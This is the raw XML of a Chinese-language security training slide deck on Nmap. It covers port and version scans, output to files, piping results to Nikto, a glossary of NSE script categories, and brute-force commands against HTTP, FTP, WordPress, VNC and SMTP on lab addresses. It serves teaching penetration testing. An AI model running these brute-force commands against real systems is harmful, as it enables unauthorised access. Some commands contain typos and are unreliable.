                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 192.168.211.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>端口扫描应用识别</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nmap ­p1­-65535 -­</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -­</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -­T4 target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>从文件读取扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ip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70000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Nmap –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>iL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ip-address.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>输出文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>greppable </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Nmap –p1-65535 –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 192.168.211.0/24 –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>oG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> nmap.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>端口的扫描结果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>通过管道交给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>进行扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Nmap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0">
              <a:cs typeface="+mn-ea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en-US" altLang="zh-CN" sz="1600" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ­p80 10.0.1.0/24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>­oG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ­ | nikto.pl ­h ­</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4431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Nmap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躲避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25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19" y="1992217"/>
            <a:ext cx="8675360" cy="3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1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Nmap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配合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msf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504" y="1763605"/>
            <a:ext cx="9230144" cy="35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2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nmap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调用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nse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脚本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27</a:t>
            </a:fld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2964" y="1161274"/>
            <a:ext cx="8375737" cy="5020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auth: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>负责处理鉴权证书（绕开鉴权）的脚本  </a:t>
            </a:r>
          </a:p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broadcast: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>在局域网内探查更多服务开启状况，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dhcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/dns/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sqlserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>等服务  </a:t>
            </a:r>
          </a:p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brute: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>提供暴力破解方式，针对常见的应用如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>snmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>等  </a:t>
            </a:r>
          </a:p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default: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>选项扫描时候默认的脚本，提供基本脚本扫描能力  </a:t>
            </a:r>
          </a:p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discovery: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>对网络进行更多的信息，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>枚举、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SNMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>查询等  </a:t>
            </a:r>
          </a:p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dos: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用于进行拒绝服务攻击  </a:t>
            </a:r>
          </a:p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exploit: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>利用已知的漏洞入侵系统  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>external: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>利用第三方的数据库或资源，例如进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>解析  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fuzzer: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>模糊测试的脚本，发送异常的包到目标机，探测出潜在漏洞 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>intrusive: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>入侵性的脚本，此类脚本可能引发对方的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>IDS/IPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>的记录或屏蔽  </a:t>
            </a:r>
          </a:p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malware: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>探测目标机是否感染了病毒、开启了后门等信息  </a:t>
            </a:r>
          </a:p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safe: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>此类与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>intrusive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>相反，属于安全性脚本  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>version: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>负责增强服务与版本扫描（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Version Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>）功能的脚本  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>负责检查目标机是否有常见的漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>），如是否有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MS08_067</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62678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nmap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5657" y="1305342"/>
            <a:ext cx="8154955" cy="4541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nmap --script=http-brute -p 80 192.168.216.101/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>身份验证爆破</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nmap --script=ftp-brute -p 21 192.168.216.101  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>审计</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>服务器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nmap --script=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>frp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-brute --script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> userbd=user.txt,passdb=pass.txt -p 21 192.168.216.101    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>指定字典破解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nmap -p80 --script=http-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-brute 192.168.216.101  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>爆破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nmap -p80  --script=http-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-brute --script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>arfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> userdb=user.txt,passdb=pass.txt 192.168.216.101  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>爆破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nmap --script=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vnc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-brute -p 5900 192.168.216.101 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vnc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>爆破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nmap -p 25 --script=smtp-brute 192.168.216.101 smtp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
